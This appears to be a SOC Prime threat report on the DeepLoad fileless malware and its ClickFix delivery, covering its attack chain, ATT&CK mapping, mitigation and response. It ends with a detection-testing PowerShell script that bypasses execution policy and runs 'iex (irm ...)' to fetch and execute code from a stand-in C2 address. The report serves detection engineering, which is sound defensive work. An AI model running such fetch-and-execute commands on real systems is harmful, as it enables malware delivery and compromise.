SOC Prime Bias: Medium

07 Apr 2026 18:16
newspaper icon ReliaQuest

DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion

Author Photo
SOC Prime Team linkedin icon Follow
DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

DeepLoad is a fileless malware family distributed through ClickFix social engineering. It relies on an obfuscated PowerShell loader, in-memory shellcode injection into trusted Windows processes, and AI-generated “noise” to reduce static-detection fidelity. The loader establishes persistence using a scheduled task and WMI event subscriptions, can propagate via USB media, and steals credentials through both a rogue browser extension and a companion filemanager.exe component.

Investigation

The report describes initial access starting with a victim-executed PowerShell command, followed by loader retrieval through mshta.exe. The loader uses Add-Type to generate a temporary DLL at runtime, then injects shellcode into LockAppHost.exe using APC-based injection. Persistence is maintained through a scheduled task and a concealed WMI event subscription capable of re-establishing infection even after cleanup, with a noted delay window of roughly three days. Credential theft is attributed to filemanager.exe alongside a malicious browser extension operating in parallel.

Mitigation

Enable PowerShell Script Block Logging and alert on suspicious PowerShell execution chains. Audit mshta.exe outbound network activity, monitor for unexpected scheduled task creation, and detect anomalous QueueUserAPC usage indicative of APC injection. During remediation, explicitly enumerate and remove WMI event subscriptions rather than relying on file/registry cleanup alone. Rotate exposed credentials and remove any unauthorized browser extensions to cut off credential-harvesting paths.

Response

If DeepLoad activity is detected, isolate the host, stop malicious PowerShell activity and terminate any injected processes. Remove the scheduled task and delete the associated WMI subscription, then eradicate filemanager.exe and the malicious browser extension. Rotate all potentially compromised credentials, sanitize any connected USB media, and validate the system for residual injection artifacts before returning it to service.

Keywords: DeepLoad, ClickFix, fileless malware, PowerShell loader, mshta.exe, Add-Type, in-memory shellcode, APC injection, QueueUserAPC, LockAppHost.exe, scheduled task persistence, WMI event subscription, USB propagation, malicious browser extension, credential theft.

"graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions step_user_exec["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy & Paste</b><br/>Victim runs PowerShell command via ClickFix."] class step_user_exec action step_powershell["<b>Action</b> – <b>T1059.001 Command and Scripting Interpreter: PowerShell</b><br/>Downloads loader using Invokeu2011Expression (IEX)."] class step_powershell action step_mshta["<b>Action</b> – <b>T1218.005 System Binary Proxy Execution: Mshta</b><br/>mshta.exe fetches remote script."] class step_mshta action step_schtask["<b>Action</b> – <b>T1053 Scheduled Task/Job</b><br/>Creates persistence task to reu2011run loader."] class step_schtask action step_injection["<b>Action</b> – <b>T1055.004 Process Injection: Asynchronous Procedure Call</b><br/>Injects shellcode into LockAppHost.exe."] class step_injection action step_reflective["<b>Action</b> – <b>T1620 Reflective Code Loading</b><br/>Compiles inu2011memory DLL via Addu2011Type."] class step_reflective action step_masquerade["<b>Action</b> – <b>T1036.003 Masquerading: Rename Legitimate Utilities</b><br/>Uses filemanager.exe and .lnk shortcuts."] class step_masquerade action step_removable["<b>Action</b> – <b>T1091 Replication Through Removable Media / T1080 Taint Shared Content</b><br/>Drops malicious shortcuts to USB drives."] class step_removable action step_wmi["<b>Action</b> – <b>T1546.003 Event Triggered Execution: WMI Event Subscription</b><br/>Persists and reu2011executes after cleanup."] class step_wmi action step_keylog["<b>Action</b> – <b>T1056.001 Input Capture: Keylogging</b><br/>Captures keystrokes for credentials."] class step_keylog action step_cred["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers / T1176 Software Extensions</b><br/>Malicious browser extension steals stored passwords."] class step_cred action step_valid["<b>Action</b> – <b>T1078 Valid Accounts</b><br/>Attacker uses harvested credentials."] class step_valid action step_c2["<b>Action</b> – <b>T1102.002 Bidirectional Web Service Communication / T1102.003 Oneu2011Way</b><br/>C2 channel and exfiltration."] class step_c2 action %% Connections step_user_exec –>|triggers| step_powershell step_powershell –>|downloads via| step_mshta step_mshta –>|executes| step_schtask step_schtask –>|creates| step_injection step_injection –>|injects into| step_reflective step_reflective –>|loads| step_masquerade step_masquerade –>|places shortcuts on| step_removable step_removable –>|enables| step_wmi step_wmi –>|activates| step_keylog step_keylog –>|captures credentials for| step_cred step_cred –>|provides| step_valid step_valid –>|facilitates| step_c2 "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Initial foothold: The attacker has a low‑privilege PowerShell session on the victim host.
    2. Bypass execution policy: They invoke PowerShell with -ep Bypass to ignore any script‑execution restrictions.
    3. Compile a .NET payload: Using Add-Type, they embed a tiny C# class that, when instantiated, performs a web request to the C2 server (http://10.0.0.5:3015/index).
    4. Download & execute remote script: The attacker pipes the result of irm (Invoke‑RestMethod) into iex, executing the malicious script in‑memory.
    5. Resulting telemetry: The command line recorded by the OS contains the three required strings (-ep Bypass, Add-Type, iex(irm http://…:3015/index)), satisfying the Sigma rule.

  • Regression Test Script:

    # DeepLoad‑like malicious execution
# This script reproduces the exact command pattern required to fire the Sigma rule.
$c2 = "http://10.0.0.5:3015/index"
$payload = @"
using System;
using System.Net;
public class Loader {
public static void Run() {
    new WebClient().DownloadString(""$c2"");
}
}
"@
# Invoke PowerShell with the bypass flag, compile the payload, then execute remote script
powershell -NoProfile -ExecutionPolicy Bypass -Command `
    "Add-Type -TypeDefinition `$payload; `
     iex (irm $c2)"

  • Cleanup Commands:

    # Remove any temporary files or loaded assemblies (if persisted)
Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue
# Optionally, clear the PowerShell transcript (if enabled)
Clear-Host

End of Report

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free